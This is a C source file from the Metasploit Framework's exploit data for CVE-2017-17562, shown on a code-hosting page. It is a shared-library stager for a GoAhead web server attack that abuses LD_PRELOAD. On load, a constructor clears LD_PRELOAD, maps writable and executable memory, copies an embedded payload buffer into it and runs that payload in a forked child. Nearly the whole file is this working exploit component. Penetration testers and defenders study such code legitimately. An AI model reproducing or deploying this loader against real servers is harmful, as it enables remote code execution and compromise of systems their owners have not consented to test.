rapid7/metasploit-framework

View on GitHub
data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c

Summary

Maintainability
Test Coverage
#include <stdio.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#include <signal.h>
#include <stdlib.h>

#ifdef OLD_LIB_SET_1
__asm__(".symver mmap,mmap@GLIBC_2.0");
__asm__(".symver memcpy,memcpy@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif

#ifdef OLD_LIB_SET_2
__asm__(".symver mmap,mmap@GLIBC_2.2.5");
__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif

#define PAYLOAD_SIZE 5000
unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};

static void _run_payload_(void) __attribute__((constructor));

static void _run_payload_(void)
{
  void *mem;
  void (*fn)();

  unsetenv("LD_PRELOAD");

  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
  if (mem == MAP_FAILED)
    return;

  memcpy(mem, payload, PAYLOAD_SIZE);
  fn = (void(*)())mem;

  if (! fork())
    fn();

  exit(0);
}